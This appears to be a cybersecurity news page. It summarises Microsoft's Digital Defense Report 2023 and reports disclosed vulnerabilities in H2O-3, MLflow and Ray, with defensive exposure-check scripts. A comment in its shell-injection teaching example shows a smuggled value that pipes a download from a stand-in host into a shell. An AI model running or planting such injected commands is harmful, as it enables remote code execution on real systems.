
Microsoft's Cybersecurity Report 2023

Microsoft recently issued its Digital Defense Report 2023, which offers important insights into the current state of cyber threats and suggests ways to improve defenses against digital attacks. Drawn from the report, these five key insights illuminate both the opportunities and the difficulties in the field of cybersecurity.

  • Ransomware Emerges as a Pervasive Threat: The report highlights the escalating menace of ransomware attacks, which have become more sophisticated and targeted. The prevalence of these attacks underscores the importance of robust cybersecurity measures. As Microsoft notes, "Defending against ransomware requires a multi-layered approach that includes advanced threat protection, regular data backups, and user education."
  • Supply Chain Vulnerabilities Demand Attention: The digital defense landscape is interconnected, and supply chain vulnerabilities pose a significant risk. The report emphasizes the need for organizations to scrutinize their supply chains for potential weaknesses. Microsoft advises, "Organizations should conduct thorough risk assessments of their supply chains and implement measures such as secure coding practices and software integrity verification."
  • Zero Trust Architecture Gains Prominence: Zero Trust, a security framework that assumes no trust, even within an organization's network, is gaining momentum. The report encourages the adoption of Zero Trust Architecture to bolster defenses against evolving cyber threats. "Implementing Zero Trust principles helps organizations build a more resilient security posture by continuously verifying the identity and security posture of devices, users, and applications," Microsoft suggests.
  • AI and Machine Learning Enhance Threat Detection: Leveraging artificial intelligence (AI) and machine learning (ML) is crucial in the fight against cyber threats. The report underscores the effectiveness of these technologies in identifying and mitigating potential risks. Microsoft recommends organizations "leverage AI and ML capabilities to enhance threat detection, response, and recovery efforts."
  • Employee Training as a Cybersecurity Imperative: Human error remains a significant factor in cyber incidents. The report stresses the importance of continuous employee training to bolster the human element of cybersecurity. Microsoft asserts, "Investing in comprehensive cybersecurity awareness programs can empower employees to recognize and respond effectively to potential threats."

Microsoft says, "A resilient cybersecurity strategy is not a destination but a journey that requires continuous adaptation and improvement." The Microsoft Digital Defense Report 2023 is an ideal starting point for a firm looking to improve its cybersecurity posture. Staying up to date on current threats to digital assets, and taking precautionary measures to secure them, is essential.






AI/ML Tools Uncovered with 12+ Vulnerabilities Open to Exploitation

 

Since August 2023, researchers on Huntr, a bug bounty platform dedicated to artificial intelligence (AI) and machine learning (ML), have disclosed more than a dozen vulnerabilities that jeopardize AI/ML models and could lead to system takeovers and the theft of sensitive information.

The vulnerabilities were discovered in widely used tools, including H2O-3, MLflow, and Ray, each of which sees hundreds of thousands or even millions of monthly downloads, and they have broader implications for the entire AI/ML supply chain, according to Protect AI, the company that operates Huntr.

H2O-3, a low-code machine learning platform that facilitates the creation and deployment of ML models through a user-friendly web interface, was found to expose its network interface by default without authentication. This flaw allows attackers to supply malicious Java objects that H2O-3 executes, giving them unauthorized access to the operating system.
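For teams running H2O-3, one quick way to check exposure is to query the REST API without credentials. Below is a minimal sketch in Python, assuming the instance listens on H2O-3's default port 54321 and that the /3/Cloud cluster-status endpoint is reachable; the URL is a placeholder to adjust for your own deployment.

```python
import requests

# Placeholder URL: H2O-3 listens on port 54321 by default; adjust for your deployment.
H2O_URL = "http://localhost:54321"

def h2o_is_unauthenticated(base_url: str, timeout: float = 5.0) -> bool:
    """Return True if the H2O-3 REST API answers cluster queries without credentials."""
    try:
        # /3/Cloud is the cluster-status endpoint of the H2O-3 REST API.
        resp = requests.get(f"{base_url}/3/Cloud", timeout=timeout)
    except requests.RequestException:
        return False  # unreachable or filtered -- treat as not exposed
    # A 200 response with no authentication challenge means anyone who can reach
    # the port can also reach the API (and, per the report, post Java objects).
    return resp.status_code == 200 and "www-authenticate" not in {k.lower() for k in resp.headers}

if __name__ == "__main__":
    print("Unauthenticated H2O-3 API reachable:", h2o_is_unauthenticated(H2O_URL))
```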

One significant vulnerability identified in H2O-3, tracked as CVE-2023-6016 with a CVSS score of 10, enables remote code execution (RCE), allowing attackers to seize control of the server and steal models, credentials, and other data. Bug hunters also pinpointed a local file inclusion flaw (CVE-2023-6038), a cross-site scripting (XSS) bug (CVE-2023-6013), and a high-severity S3 bucket takeover vulnerability (CVE-2023-6017).

MLflow, an open-source platform that manages the entire ML lifecycle, was likewise found to lack authentication by default. Researchers identified four critical vulnerabilities, the most severe being arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015, both with a CVSS score of 10). These bugs let unauthenticated attackers overwrite files on the operating system and achieve RCE. Critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities were also discovered.
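A similar spot check works for an MLflow tracking server. The sketch below assumes an MLflow 2.x client and a server on the default port 5000 (the URI is a placeholder): it calls the tracking API without setting the MLFLOW_TRACKING_USERNAME/MLFLOW_TRACKING_PASSWORD environment variables, so a successful response suggests the server accepts unauthenticated requests.

```python
import mlflow
from mlflow.exceptions import MlflowException

# Placeholder tracking URI; the MLflow tracking server defaults to port 5000.
TRACKING_URI = "http://localhost:5000"

def mlflow_accepts_anonymous(uri: str) -> bool:
    """Return True if the MLflow tracking API answers without credentials."""
    mlflow.set_tracking_uri(uri)
    try:
        # Deliberately call the API without MLFLOW_TRACKING_USERNAME/PASSWORD set.
        mlflow.search_experiments(max_results=1)
        return True
    except MlflowException:
        # An auth or API rejection means the server pushed back
        # (connection failures may surface as other exceptions).
        return False

if __name__ == "__main__":
    print("Unauthenticated MLflow tracking API reachable:", mlflow_accepts_anonymous(TRACKING_URI))
```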

The Ray project, an open-source framework for distributed ML model training, shares a similar lack of default authentication. A critical code injection flaw in Ray's cpu_profile format parameter (CVE-2023-6019, CVSS score of 10) could result in a complete system compromise: the parameter was not validated before being inserted into a system command executed in a shell. Bug hunters also identified two critical local file inclusion issues (CVE-2023-6020 and CVE-2023-6021), enabling remote attackers to read any file on the Ray system.
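The Ray flaw follows a classic injection pattern: a request parameter flows into a shell command without validation. The snippet below is not Ray's code; it is an illustrative sketch of the vulnerability class and its usual mitigation, using a hypothetical profiler command and a hypothetical allow-list of output formats.

```python
import subprocess

# Hypothetical allow-list of acceptable profile output formats.
ALLOWED_FORMATS = {"flamegraph", "speedscope"}

def run_profiler_unsafe(fmt: str) -> None:
    # Vulnerable pattern: untrusted input interpolated into a shell string.
    # fmt = "flamegraph; curl evil.example | sh" would run the attacker's command.
    subprocess.run(f"profiler --format {fmt}", shell=True, check=True)

def run_profiler_safe(fmt: str) -> None:
    # Mitigated pattern: validate against an allow-list and pass arguments as a
    # list, so no shell ever interprets the value.
    if fmt not in ALLOWED_FORMATS:
        raise ValueError(f"unsupported profile format: {fmt!r}")
    subprocess.run(["profiler", "--format", fmt], check=True)
```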

All these vulnerabilities were responsibly reported to the respective vendors at least 45 days before public disclosure. Users are strongly advised to update their installations to the latest non-vulnerable versions and restrict access to applications lacking available patches.